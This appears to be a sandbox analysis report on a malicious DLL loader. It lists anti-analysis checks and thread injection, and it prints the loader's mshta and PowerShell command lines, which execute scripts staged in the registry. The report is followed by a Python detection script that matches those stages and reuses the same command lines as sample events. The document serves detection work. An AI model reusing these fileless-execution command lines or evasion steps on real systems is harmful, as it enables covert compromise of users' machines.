            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4400 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 | Thread sleep count: 5638 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 | Thread sleep count: 3533 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812 | Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408 | Thread sleep count: 5347 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328 | Thread sleep count: 3944 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348 | Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888 | Thread sleep count: 5671 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888 | Thread sleep count: 3636 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4968 | Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\loaddll32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4780
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1593
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5638
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3533
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5347
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3944
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5671
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3636
            Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exe | Process information queried: ProcessInformation
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_03B08B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_03B10219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_03B016BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_048E16BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_048F0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_048E8B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_059116BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05918B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05920219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_009A0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00998B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_009916BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_03B08F03 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
            Source: mshta.exe, 00000021.00000003.374607061.00000121EDD21000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
            Source: control.exe, 00000030.00000002.420216266.000002031134E000.00000004.00000020.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_03B039B2 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0CE8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0A64 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0C57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0BFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0B14 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960CE8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960C57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960A64 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960BFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960B14 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C0B14 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C0BFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C0C57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C0A64 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C0CE8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process queried: DebugPort
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_03B02ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_048E2ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05912ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00992ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

            HIPS / PFW / Operating System Protection Evasion:

            Maps a DLL or memory area into another process
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: unknown protection: execute and read and write
            Writes to foreign memory regions
            Source: C:\Windows\System32\loaddll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6912712E0
            Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6912712E0
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3352
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: unknown EIP: 8DCB1580
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
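The mshta.exe and powershell.exe command lines above show the loader's two registry-staged stages: an inline HTA that reads a script out of HKCU\Software\AppDataLow\Software\Microsoft\<GUID>\TestLocal with WScript.Shell.RegRead and eval()s it, and a PowerShell one-liner that aliases gp and iex, decodes the UrlsReturn value of the same key as ASCII and executes it. The Python below is an added example for hunting that chain in process-creation telemetry; it is not part of this report or of the sample. It classifies events modelled on the "Process created" lines (the command lines are copied from the report, the ProcEvent field names are an assumption), links the two stages through the registry subkey they share, and decodes a staged value the way the PowerShell stage does but without running it. The bytes in SAMPLE_URLSRETURN and the example.invalid URL are constructed stand-ins; the real UrlsReturn content is not in the report.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # full command line of the created process


# Stage 1: inline HTA that RegReads a script from HKCU and eval()s it.
HTA_REGREAD = re.compile(
    r"about:<hta:application>.*?regread\('(?P<key>HKCU\\+[^']+)'\)", re.I | re.S)
# Stage 2: powershell.exe that aliases iex, reads a registry value with gp and executes it.
PS_ALIAS_IEX = re.compile(r"new-alias\s+-name\s+\w+\s+-value\s+iex\b", re.I)
PS_GP_VALUE = re.compile(r'\(\w+\s+"(?P<key>HKCU:[^"]+)"\)\.(?P<value>\w+)', re.I)

DLL_HOSTS = {"rundll32.exe", "regsvr32.exe", "loaddll32.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def normalize_key(key):
    """Collapse JScript ('HKCU\\\\...') and PowerShell ('HKCU:...') spellings to one form."""
    key = key.replace("HKCU:", "HKCU\\")
    return re.sub(r"\\{2,}", r"\\", key).lower()


def classify(ev):
    """Return a finding dict for a suspicious event, or None."""
    img, parent = basename(ev.image), basename(ev.parent)
    if img == "mshta.exe":
        m = HTA_REGREAD.search(ev.cmdline)
        if m:
            subkey, value = normalize_key(m.group("key")).rsplit("\\", 1)
            return {"stage": "hta_regread_eval", "parent": parent,
                    "from_dll_host": parent in DLL_HOSTS, "subkey": subkey, "value": value}
    elif img == "powershell.exe" and parent == "mshta.exe" and PS_ALIAS_IEX.search(ev.cmdline):
        m = PS_GP_VALUE.search(ev.cmdline)
        if m:
            return {"stage": "ps_iex_from_registry", "parent": parent,
                    "subkey": normalize_key(m.group("key")), "value": m.group("value").lower()}
    return None


def find_chains(events):
    """Map each registry subkey used by both stages to the value names read from it."""
    findings = [f for f in map(classify, events) if f]
    hta_keys = {f["subkey"] for f in findings if f["stage"] == "hta_regread_eval"}
    chains = {}
    for f in findings:
        if f["stage"] == "ps_iex_from_registry" and f["subkey"] in hta_keys:
            chains.setdefault(f["subkey"], set()).add(f["value"])
    for f in findings:
        if f["stage"] == "hta_regread_eval" and f["subkey"] in chains:
            chains[f["subkey"]].add(f["value"])
    return {k: sorted(v) for k, v in chains.items()}


def triage_payload(raw):
    """Decode a REG_BINARY value as the PowerShell stage does (ASCII), then inspect it instead of executing it."""
    text = raw.decode("ascii", errors="replace")
    return {"length": len(text),
            "has_iex": bool(re.search(r"\biex\b|invoke-expression", text, re.I)),
            "urls": re.findall(r"https?://[^\s'\"]+", text, re.I)}


# Constructed sample events; command lines are taken from the report's "Process created" lines.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\System32\mshta.exe",
              r"""C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>"""),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'),
    ProcEvent(r"C:\Windows\System32\control.exe", r"C:\Windows\System32\rundll32.exe",
              r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h'),
]
# Constructed stand-in for the UrlsReturn bytes (assumption: the real value is not in the report).
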